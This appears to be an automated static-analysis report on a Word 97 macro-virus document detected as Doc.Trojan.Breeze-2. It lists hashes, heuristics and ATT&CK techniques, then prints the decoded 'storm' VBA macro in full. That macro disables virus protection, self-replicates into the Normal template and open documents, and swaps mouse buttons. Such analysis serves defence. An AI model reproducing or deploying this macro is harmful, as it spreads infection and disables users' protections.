Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e259292cdf89786d…

MALICIOUS

Office (OLE)

33.5 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-16
MD5: 46fba79a84a54824d53ed7aac2507ca0 SHA-1: 6c981b33f1f5946d24553e04499520bd043b2601 SHA-256: e259292cdf89786d36cec2255d273cdd706301984a753e0358dd8e79ce1a4564
228 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1027 Obfuscated Files or Information

The sample is a malicious Word document containing VBA macros. The 'storm' macro includes an AutoClose subroutine that attempts to disable virus protection and replicate itself to the Normal template and the active document. It also contains obfuscated logic that manipulates mouse button states and displays a message box, likely as a distraction or to hinder analysis. The presence of self-replication and AV tampering heuristics, along with the ClamAV detection, strongly indicates malicious intent.

Heuristics 5

  • ClamAV: Doc.Trojan.Breeze-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Breeze-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1166 bytes
SHA-256: 178f48cc1823ed32282d3a4808aca8698852f4d465fe335f6deb347a86b7ef8f
Detection
ClamAV: Doc.Trojan.Breeze-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "storm"
Private Declare Function SwapMouseButton Lib "USER32" (ByVal bSwap As Long) As Long
Private Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
Sub AutoClose()
On Error Resume Next
Options.VirusProtection = False
If Len(NormalTemplate.VBProject.VBComponents.Item("storm")) < 1 Then Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "storm", wdOrganizerObjectProjectItems
If Len(ActiveDocument.VBProject.VBComponents.Item("storm")) < 1 Then Application.OrganizerCopy NormalTemplate.FullName, ActiveDocument.FullName, "storm", wdOrganizerObjectProjectItems
ActiveDocument.Save
J = Minute(Now()) Mod 2
k = day(Now()) Mod 2
If k <> 0 And J = 0 Then
      SwapMouseButton &H2
End If
If Month(Now()) = 8 And day(Now()) = 11 Then
    While ShowCursor(False) >= 0
    Wend
    MsgBox "Solar Eclipse 12.35 PM"
End If
End Sub